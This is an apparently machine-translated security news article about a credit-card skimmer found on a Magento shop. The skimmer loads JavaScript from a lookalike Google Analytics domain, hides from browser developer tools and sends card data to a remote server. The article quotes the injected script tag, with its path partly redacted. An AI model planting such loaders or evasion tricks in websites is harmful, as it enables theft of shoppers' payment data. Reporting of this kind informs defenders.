Wednesday, June 3, 06:34
Home security Malicious Google domains are used in card skimmer attacks

Malicious Google domains are used in card skimmer attacks

skimmerThe Criminals of cyberspace have found a new way to steal money by users, who do on-line transactions. Hackers use it false domains, which are supposed to be Google, and lead users to infringing sites. Seeing it domain, users think the site is safe. Some Sucuri researchers came into contact with a Magento website owner, and were informed that a domain was infected with a skimmer credit cards. Skimmer uses JavaScript code, which contains a link to it malicious address google-analytîcs [.] Com.

Here's an example of malicious code:

<script type = "text / javascript" src = "//google-analytics.com/www.[redacted]/3f5cf4657d5d9.js"> </script>

The researchers said that hackers they use reputable names like Google, so visitors think that sites are safe. But they do not pay attention to the fact that there is one domain differentiation, which indicates that it is a malicious site.

Researchers have discovered that the particular skimmer is similar to others that are circulating and storing data, imported, as well as drop-down menu options.

However, skimmer checks if developer tools are used either in Google Chrome or in Mozilla Firefox. If used, it will not attempt to steal any information to avoid detection.

If no developer tools are found, they steal information and send them to a remote one server.

Card skimmers are installed through vulnerable e-commerce sites and are a serious and frequent problem. In July, the RiskIQ software company said it was a recent one campaign managed to infect more than 17.000 websites with card-skimming malware in just a few months.

Magento users, like WordPress and others Drupal they must constantly update their software. Magento domains are targeted by hackers trying to steal economic data. A report showed that 2018, the 83% of Magento websites found to be vulnerable to card skimmers.

LEAVE ANSWER

Please enter your comment!
Please enter your name here

Absent Mia
Absent Miahttps://www.secnews.gr
Being your self, in a world that constantly tries to change you, is your greatest achievement

LIVE NEWS

Samsung Access: Samsung's new service for new Galaxy devices!

Samsung has launched a new subscription service for upgrades, starting with the Galaxy S20 series. The new service, named Samsung ...

Microsoft: The tools that will now be available to everyone!

Microsoft now has the "Virtual Assistant Accelerator" and "Bot Framework Composer" tools for its entire user base. Developers can ...

Sony: Cancel PS5 event due to Floyd case!

The event that Sony had planned for the PS5 on June 4 was postponed indefinitely, due to the deplorable situation that prevails ...

Cisco warns: These Nexus switches have been hit by a serious security flaw

Cisco has warned customers with Nexus switches running NX-OS software to install updates to address a serious flaw ...

Windows 10 May 2020 Update: Get Windows 10 for € 9.09

As we all know, Windows 10 May 2020 Update has been released. It is safer, more reliable and more efficient than ever. It is certain that with ...

Anonymous's hack includes data from previous leaks!

As protests over the death of George Floyd in Minneapolis have spread across the United States, cyberattacks have targeted police ...

Critical Exim errors have been fixed, but many servers are still at risk

The update of Exim mail servers is not fast enough and the members of the Russian hacker Sandworm team are actively exploiting three critical ...

New Cisco vulnerability that concerns you!

A new critical Cisco vulnerability has been identified that concerns you: For those who don't know, Cisco recently announced that some of the servers ...

Antifa tweets from extreme rightists call for violence!

The "Antifa tweets" that flooded Twitter and promoted violence, actually came from a well-known far-right group! The information came in ...

Apple introduces the new USB-C Diagnostic Tool

Apple introduces the new USB-C Diagnostic Tool. See the new features: Apple finally brings the new internal USB-C Diagnostic Tool, ...